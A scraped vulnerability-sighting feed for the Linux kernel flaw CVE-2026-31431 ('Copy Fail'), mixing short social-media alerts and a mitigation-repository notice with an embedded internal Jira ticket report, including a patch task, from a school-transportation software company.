[Vehicle Plan Error] Front end error for Vehicle on Route Historical view\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 16, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1767\n                      500 Internal Server Error on Athena Routing Screen \u2013 eligibilities API\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1766\n                      [Helena] API call fails on clicking \"Add New\" Student \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1765\n                      Deleting a student without entering any data in Add student form is giving 405 error \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 27, '26 (27d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1761\n                       is displayed against a checkbox on Custom transportation Needs \n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1760\n                      Pick A Location - External address return as the SA\" is failing because the \"Pick A Location\" button cannot be located on the page, preventing test execution.\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1759\n                      [Chief Leschi-1.78][Reports] [User defined Reports] Unable to create a new report template\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 31, '26 (25d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1758\n                      API returns 500 error when sending IN filter with empty values array in search request\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1757\n                      Stops/Checkpoints \u2013 Map not displayed in \u201cPick A Location\u201d popup when using Relocate\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1756\n                      [Chief Leschi-1.78] Created date is not same when downloaded a report\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (30d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1755\n                      Data Management \u2013 Map fails to load across multiple modules\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1754\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with CA Reports\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 24, '26 (30d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1753\n                      Students \u2013 Student picture API returning 404 Not Found when opening student record\n                      Josiah Brown\n                      Mar 12, '26\n                      Apr 6, '26 (21d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1752\n                      Students \u2013 Address parsing APIs (type, prefix, suffix) returning 500 Internal Server Error in background requests\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1751\n                      Students \u2013 Opening student record triggers \"Error parsing address\" popup and address standardization API returns 500\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1749\n                      Historical changes API is returning 500 Internal server error on Vehicle on routes in Telamatics\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1615\n                      Payroll Data is not available/displaying\n                      \u2014\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1614\n                      Data is not Visible for Default Working Hours in Employees under Data Management\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1613\n                      UDF Tab is not Displayed in Employee Information Page\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1611\n                      RPO \u2013 OPT actions failure\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1610\n                      [Chief Leschi-1.78] Created by \"unknown\" appearing with Stops details\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1608\n                      Location search fails with 504 Gateway Timeout when adding a new Stop\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1606\n                      Student Needs dialogs shows formatting issues and invalid \u201c504\u201d need option\n                      Josiah Brown\n                      Mar 11, '26\n                      Mar 11, '26 (39d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1594\n                      [Foundations] 404 error on Students detail page\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1591\n                      Web Query not configured for aldine-tx\n                      Josiah Brown\n                      Mar 10, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1579\n                      [Support][1.78] [Telematics] -- Error on FE Live Subs\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 9, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1578\n                      [Support-Site-1.78] 500 internal server error for \"eligibilities\"call\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 10, '26 (40d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1577\n                      [Training][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 9, '26\n                      Mar 30, '26 (26d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1575\n                      [Manitouspring][1.78] [Telematics-Drivers] -- Error on FE for Route Assignment\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 9, '26 (41d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1572\n                      [Manitouspring][1.78] Audit Logs: Unknown has been shown for many logs in users column\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1570\n                      500 err on cancel report API\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1569\n                      API Timesout - Endless Spinning Wheel Issue\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1562\n                      API times out/ when searching with keywords for location in Pick a Location Popup [smoke/hemet]\n                      Josiah Brown\n                      Mar 6, '26\n                      Mar 6, '26 (42d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1558\n                      [Houston-1.780] [Mapping] Console Error\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (43d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1556\n                      Home Page - Telematics module not displayed on Home Page\n                      Josiah Brown\n                      Mar 5, '26\n                      Mar 5, '26 (43d)\n                      \u2014\n                      To Do\n                    \n\nData sourced live from Jira on May 05, 2026 at 06:32 PM.\n\nfunction showTab(key,el){\n  document.querySelectorAll('.tab').forEach(t=>t.classList.remove('active'));\n  el.classList.add('active');\n  document.querySelectorAll('.pane').forEach(p=>p.style.display='none');\n  document.getElementById('pane-'+key).style.display='block';\n}\n\n\n", "creation_timestamp": "2026-05-05T18:32:55.000000Z"}, {"uuid": "81162c86-5101-40d9-a557-5ee8e8d966e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3ml4ig7eeow24", "content": "Urgent: 'Copy Fail' vulnerability (CVE-2026-31431) affects Linux kernels since 2017, granting root access to unprivileged users. Patch immediately to secure your systems. #Linux #CyberSecurity #CVE202631431 Link: thedailytechfeed.com/copy-fail-fl...", "creation_timestamp": "2026-05-05T15:21:03.807741Z"}, {"uuid": "d4936136-edcb-4e48-bab9-251ce169bc1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82955", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a ubuntu-cve-2026-31431-mitigation\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a mrmtwoj\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 18:50:49\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u062f\u0633\u062a\u0648\u0631\u0627\u0644\u0639\u0645\u0644\u200c\u0647\u0627\u06cc \u06a9\u0627\u0647\u0634 \u0631\u06cc\u0633\u06a9 \u0648 \u0628\u0647\u200c\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0628\u0631\u0627\u06cc CVE-2026-31431 \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u0627\u0648\u0628\u0648\u0646\u062a\u0648\u060c \u0634\u0627\u0645\u0644 \u0645\u0631\u0627\u062d\u0644 \u0627\u0631\u062a\u0642\u0627\u0621 \u06a9\u0631\u0646\u0644 \u0648 kmod.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T19:00:05.000000Z"}, {"uuid": "a2fb28a9-d49c-451c-b502-e702f45e0b38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tatzelwurm.eurosky.social/post/3ml4y4tbyg62s", "content": "Den neuen Linux Kernel nicht eingespielt und SSH Zugang geknackt??\n\nCVE-2026-31431, CVSS 7.8", "creation_timestamp": "2026-05-05T20:02:08.214339Z"}, {"uuid": "0002eaf3-220f-4f79-99c0-ae3471a68d2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3ml4zeylbdib2", "content": "CISA warns Linux Copy Fail flaw is being exploited to gain root access CISA has added the Linux kernel vulnerability CVE-2026-31431, known as Copy Fail, to its Known Exploited Vulnerabilities catal...\n\n#News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-05T20:24:38.878444Z"}, {"uuid": "8732cace-e770-4ffe-baf7-50d08a487b7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/9a60a90f5fec78acbb843852423e6888", "content": "\n\n\n\n\nJira Report \u2014 DO / IM / S2\n\n  :root {\n    --bg: #fff; --bg2: #f5f4ef; --bg3: #ebebeb;\n    --tx: #1a1a1a; --tx2: #666660; --tx3: #999994;\n    --info: #185FA5; --bdr: rgba(0,0,0,0.12); --bdr2: rgba(0,0,0,0.22);\n    --r: 8px; --rl: 12px;\n    --font: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;\n    --mono: 'SF Mono','Fira Code',monospace;\n  }\n  @media(prefers-color-scheme:dark){\n    :root{--bg:#1e1e1c;--bg2:#2a2a28;--bg3:#333330;--tx:#f0efe8;--tx2:#a8a79f;--tx3:#6e6e68;--info:#85B7EB;--bdr:rgba(255,255,255,0.1);--bdr2:rgba(255,255,255,0.18)}\n  }\n  *{box-sizing:border-box;margin:0;padding:0}\n  body{font-family:var(--font);background:var(--bg);color:var(--tx);padding:24px;max-width:1300px;margin:0 auto}\n  h1{font-size:18px;font-weight:500;margin-bottom:4px}\n  .sub{font-size:12px;color:var(--tx2);margin-bottom:20px}\n  .tabs{display:flex;gap:6px;margin-bottom:1.25rem;flex-wrap:wrap}\n  .tab{padding:5px 13px;border:0.5px solid var(--bdr2);border-radius:var(--r);font-size:13px;cursor:pointer;background:var(--bg);color:var(--tx2)}\n  .tab.active{background:var(--bg2);color:var(--tx);font-weight:500}\n  .tab:hover:not(.active){background:var(--bg2)}\n  .legend{display:flex;gap:14px;flex-wrap:wrap;margin-bottom:1rem;font-size:11px;color:var(--tx2);align-items:center}\n  .li{display:flex;align-items:center;gap:4px}\n  .ld{width:9px;height:9px;border-radius:2px}\n  .summary-grid{display:grid;grid-template-columns:repeat(3,minmax(0,1fr));gap:8px;margin-bottom:1.25rem}\n  .metric{background:var(--bg2);border-radius:var(--r);padding:10px 12px}\n  .ml{font-size:11px;color:var(--tx2);margin-bottom:3px}\n  .mv{font-size:20px;font-weight:500}\n  .project-block{margin-bottom:1.1rem;border:0.5px solid var(--bdr);border-radius:var(--rl);overflow:hidden}\n  .ph{padding:9px 14px;border-bottom:0.5px solid var(--bdr);display:flex;align-items:center;justify-content:space-between}\n  .pn{font-size:13px;font-weight:500}\n  .pm{font-size:11px;color:var(--tx2)}\n  .th{padding:5px 14px;font-size:11px;font-weight:500;color:var(--tx2);background:var(--bg2);display:flex;align-items:center;gap:6px;border-top:0.5px solid var(--bdr)}\n  .tc{background:var(--bg3);color:var(--tx2);padding:1px 6px;border-radius:var(--r);font-size:10px}\n  .cols{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:4px 14px;font-size:10px;color:var(--tx3);background:var(--bg2);border-top:0.5px solid var(--bdr)}\n  .ir{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:6px 14px;align-items:start;border-top:0.5px solid var(--bdr);font-size:11px}\n  .ir.stale{background:rgba(250,238,218,0.3)}\n  .ir.highest{background:rgba(252,235,235,0.35)}\n  .ir.overdue{background:rgba(252,235,235,0.45)}\n  .ir.stale.highest,.ir.stale.overdue{background:rgba(250,220,200,0.45)}\n  @media(prefers-color-scheme:dark){\n    .ir.stale{background:rgba(99,56,6,0.2)}.ir.highest{background:rgba(121,31,31,0.2)}\n    .ir.overdue{background:rgba(121,31,31,0.3)}.ir.stale.highest,.ir.stale.overdue{background:rgba(110,40,6,0.28)}\n  }\n  .ik{color:var(--info);font-size:10px;font-family:var(--mono);white-space:nowrap;text-decoration:none}\n  .ik:hover{text-decoration:underline}\n  .is{color:var(--tx);line-height:1.4;overflow:hidden;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}\n  .ia{color:var(--tx2);font-size:10px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}\n  .dt{font-size:10px;white-space:nowrap}\n  .upd-ok{color:var(--tx2)}.upd-stale{color:#BA7517;font-weight:500}\n  .due-ok{color:var(--tx2)}.due-over{color:#A32D2D;font-weight:500}\n  .cr{color:var(--tx2)}\n  @media(prefers-color-scheme:dark){.upd-stale{color:#FAC775}.due-over{color:#F7C1C1}}\n  .dot-h{display:inline-block;width:5px;height:5px;border-radius:50%;background:#E24B4A;margin-right:2px;vertical-align:middle}\n  .dot-s{display:inline-block;width:5px;height:5px;border-radius:50%;background:#EF9F27;margin-right:2px;vertical-align:middle}\n  .dot-d{display:inline-block;width:5px;height:5px;border-radius:50%;background:#D85A30;margin-right:2px;vertical-align:middle}\n  .sb{font-size:10px;padding:2px 6px;border-radius:var(--r);text-align:center;white-space:nowrap}\n  .s-ip{background:#FAEEDA;color:#854F0B}.s-td{background:#E1F5EE;color:#0F6E56}\n  .s-oi{background:#FCEBEB;color:#A32D2D}.s-xx{background:var(--bg2);color:var(--tx2)}\n  @media(prefers-color-scheme:dark){\n    .s-ip{background:#633806;color:#FAC775}.s-td{background:#085041;color:#9FE1CB}.s-oi{background:#791F1F;color:#F7C1C1}\n  }\n  .empty{padding:16px;text-align:center;color:var(--tx3);font-size:12px}\n  .footer{font-size:11px;color:var(--tx3);margin-top:24px}\n\n\n\n\nJira Active Issues Report \u2014 DO / IM / S2\n\nGenerated May 05, 2026 at 10:29 PM  \u00b7  Excludes Done, Fixed, Canceled, Deferred  \u00b7  https://karrostech.atlassian.net\n\nLast 24 hrs24\u201348 hrs ago2\u20137 days agoOlder than 7 days\n\n\n  Highest priority\n  Stale \u22655 business days\n  Due date missed\n\n\n\n\n\nDO \u2014 Edulog DevOps\n4\n\nIM \u2014 Incident Management\n5\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                4 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nTask 4\n                    \n\n                      DO-2046\n                      Alamance, NC - Please turn on User Defined Reports\n                      JD Hawk\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2042\n                      Client Cancelation for Kuna Joint School District, ID - May 29 shutdown\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      On hold\n                    \n                    \n\n                      DO-2041\n                      Remove the test server - fr-routing-legacy-test  it is no longer needed.\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2040\n                      Remove queuedNotification lambda function when associated NotificationService changes are deployed\n                      \u2014\n                      May 4, '26\n                      May 4, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                5 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 4\n                    \n\n                      IM-7574\n                      Gwinnett, GA - Missing Data in Telematics\n                      Josiah Brown\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7573\n                      Brunswick County, NC - APP Issues\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7571\n                      Cleveland, OH - Client Reported Delays in Both Telematics and with Parent Portal Messages this Morning\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7569\n                      Zonar - Delay / Omission of pings to SM, PP\n                      Nick Sundberg\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \nTask 1\n                    \n\n                      IM-7572\n                      Framingham Public Schools, GPS units not reporting in since 11:30 AM today\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n1\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                1 active issue\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nTask 1\n                    \n\n                      DO-2037\n                      Deploy Hafeez's Data Build Tool\n                      Boluwatife Olaifa\n                      May 4, '26\n                      May 4, '26\n                      May 4, '26\n                      Backlog\n                    \n\n\n\nDO \u2014 Edulog DevOps\n9\n\nIM \u2014 Incident Management\n15\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                9 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nBug 2\n                    \n\n                      DO-2034\n                      DP V2 (build 180/AV1): EDP gateway /v4.0/vehicles/search returns 0 vehicles for development-test-school tenant\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2033\n                      DP V2 (build 180/AV1): POST /apilive/setting/event/add returns 500 after login (tenantId='', deviceId=0)\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \nStory 1\n                    \n\n                      DO-2025\n                      Birdville, TX - Please deploy Telematics\n                      Cory Emlen\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      IN PROGRESS\n                    \nTask 6\n                    \n\n                      DO-2032\n                      Need script run on Cobb to remove duplicate locations\n                      Vader\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-2028\n                      All legacy PP ingestions have not run:\n                      Josiah Brown\n                      May 1, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2027\n                      Patch infra with CopyFail (CVE-2026-31431)\n                      Josiah Brown\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2026\n                      Johnston NC Demo Site down\n                      Vader\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-2024\n                      Review all deployments, evaluate setting limits\n                      Josiah Brown\n                      Apr 29, '26\n                      Apr 29, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2023\n                      Testing Release Servers\n                      \u2014\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                15 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 15\n                    \n\n                      IM-7567\n                      Fayette County, no bus event update since 4/29\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7564\n                      Knox, TN - Gps units not reporting in since yesterday\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7563\n                       West Shore - Parent Portal not working\n                      Brandon Donnelson\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7561\n                      Denton, TX - Parent Portal App is not tracking buses\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7560\n                      Suffolk, call from parent experiencing tracking issues.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7559\n                      New Kent, parent portal not tracking\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7557\n                      New Hanover, Parent portal  tracking issues\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7556\n                      Jefferson, parent portal not tracking \n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7555\n                      Elyria-OH ,Parent Portal App don't track the bus.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7554\n                      Peoria, AZ - Parent Portal Down\n                      Brandon Donnelson\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7553\n                      Stanfield, AZ's Parent Portal is not working as of this morning.  Last reading 4:16am.  \n                      \u2014\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Blocker\n                    \n                    \n\n                      IM-7551\n                      SM Can't Send Messages to PP/PPL\n                      Boluwatife Olaifa\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7550\n                      Cleveland, OH - Not able to track buses - GPS tracking down\n                      Kehinde Metibemu\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7548\n                      Cobb County, GA - Severely Degraded Athena Performance\n                      Brandon Donnelson\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7547\n                      Rochambeau, MD - Busses 203/204 have not had movement in Parent Porta Lite since 7:30 PM on 4/27\n                      Josiah Brown\n                      Apr 29, '26\n                      May 4, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n50\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                50 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nATH New site request 1\n                    \n\n                      DO-1787\n                      Elyria, OH - Athena Conversion from Legacy\n                      Cory Emlen\n                      Mar 17, '26\n                      Apr 30, '26\n                      Apr 17, '26\n                      Blocked\n                    \nBug 49\n                    \n\n                      DO-2005\n                      Staging-epic-FR3-eks: Bell Time task creation throws ERROR_LOADING_CONTEXT\n                      Vader\n                      Apr 27, '26\n                      Apr 27, '26 (6d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1905\n                      Parent Portal missing route/vehicle data after EKS 1.34 upgrade \u2014 missed cron sync + Hibernate 6 bug\n                      \u2014\n                      Apr 6, '26\n                      Apr 6, '26 (21d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1855\n                      There is no data available in Route assignment, Live substitution modules of Telematcis for Johnston site\n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1854\n                      There is no data available in multiple pages like Students, Runs, Routes modules of Routing for Johnston site \n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1842\n                      EDTA service missing MongoDB JVM args \u2014 broken on 57 production tenants\n                      \u2014\n                      Mar 25, '26\n                      Mar 25, '26 (29d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1801\n                      release-2-fr - Elastic search error displays into log - Unable to search for stop locations\n                      \u2014\n                      Mar 19, '26\n                      Mar 19, '26 (33d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1786\n                      [EastAllen, IN 1.78 Smoke]CA Result CSV \u2013 Export fails for valid dates with 400 Bad Request (invalid page number)\n                      Dane Elwood\n                      Mar 17, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      Blocked\n                    \n                    \n\n                      DO-1785\n                      [EastAllen, IN 1.78 Smoke]Vehicles \u2013 Seating Configuration popup shows error \u201cnetwork issues\u201d due to backend API failure\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1784\n                      [Lake Superior 1.78 Smoke]Time & Attendance module not opening from main dashboard\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1783\n                      Config API is failing for Time & Attendance module in Collinsville site \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1782\n                      Several API calls are failed in ultilities --> Employee Import and Queue Priority modules \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1779\n                      [Cleveland -1.78] [Time & attendance][Absence Record] Data preview is not available\n                      Josiah Brown\n                      Mar 16, '26\n                      Mar 16, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1776\n                      Routes API CORS Blocked & Gateway Timeout on Routes Management Page\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 15, '26 (37d)\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-1775\n                      [Chicago-1.78] [Telematics --> Edulog standard reports] - Unable to select date range for AM on time report\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 13, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1768\n                      [moorhead 1.78.0] [Telematics] [Vehicle Plan Error] Front end error for Vehicle on Route Historical view\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 16, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1767\n                      500 Internal Server Error on Athena Routing Screen \u2013 eligibilities API\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1766\n                      [Helena] API call fails on clicking \"Add New\" Student \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 23, '26 (31d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1765\n                      Deleting a student without entering any data in Add student form is giving 405 error \n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 27, '26 (27d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1761\n                       is displayed against a checkbox on Custom transportation Needs \n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1760\n                      Pick A Location - External address return as the SA\" is failing because the \"Pick A Location\" button cannot be located on the page, preventing test execution.\n                      Josiah Brown\n                      Mar 12, '26\n                      Mar 12, '26 (38d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1759\n                      [Chief Leschi-1.78][Reports] [User defined Reports] Unable to create a new report 